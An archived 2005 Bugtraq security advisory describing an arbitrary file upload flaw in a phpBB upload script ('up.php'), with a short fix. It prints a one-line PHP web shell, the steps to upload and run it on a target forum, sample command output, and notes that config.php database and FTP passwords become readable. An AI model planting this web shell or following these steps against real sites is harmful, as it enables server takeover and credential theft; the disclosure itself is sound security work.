| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 7 Apr 2005 20:21:38 -0600 From: Status-x <phr4xz@...il.com> To: bugtraq@...urityfocus.com Subject: phpBB Upload Script "up.php" Arbitrary File Upload ##################################################################### Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: phr4xz@...il.com - status-x@...kersoft.net $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL: http://phpbb.com $ Affected Software: phpBB 2.0.x Note: Sorry if it has been posted before ##################################################################### -= Description =- phpBB its a forums system written in php which can support images, polls, private messages and more http://www.phpbb.com --------------------------------------------------------------------------- -= Vulnerabilities =- - | "Arbitrary File Upload" | In phpBB forums there is an script which can allow to remote and registered users to upload files with arbitrary content and with any extension. I didnt found any website where i can download the script so i couldnt check who made it. - | Examples: | We can create and example code to upload it to the "test site" <? system($cmd) ?> And save it as cmd.php. The we enter to: -------------------------- http://target/phpbb/up.php -------------------------- And upload our code, to see our file we just enter to: ----------------------------------- http://targey/phpbb/uploads/cmd.php ----------------------------------- And we could see that our file has been uploaded: Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2 The we can execute *NIX commands to obtain extremely compromising info that could end with the "deface" of the affected site: ----------------------------------------------------- Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux /home/target/public_html/forum/uploads uid=32029(target) gid=530(target) groups=530(target) ------------------------------------------------------ This is just an example to what can be done by a malicious attacker. - | "Password Disclosure" | The remote or local attacker can also read the config.php file disclosing the information about the DB and possible the FTP password ------------------------------------------------------ Example -= How to FIX =- Just filter the allowed extensions of the uploaded files in the up.php source. -= Contact =- Status-x phr4xz@...il.com http://www.defacers.com.mx
Powered by blists - more mailing lists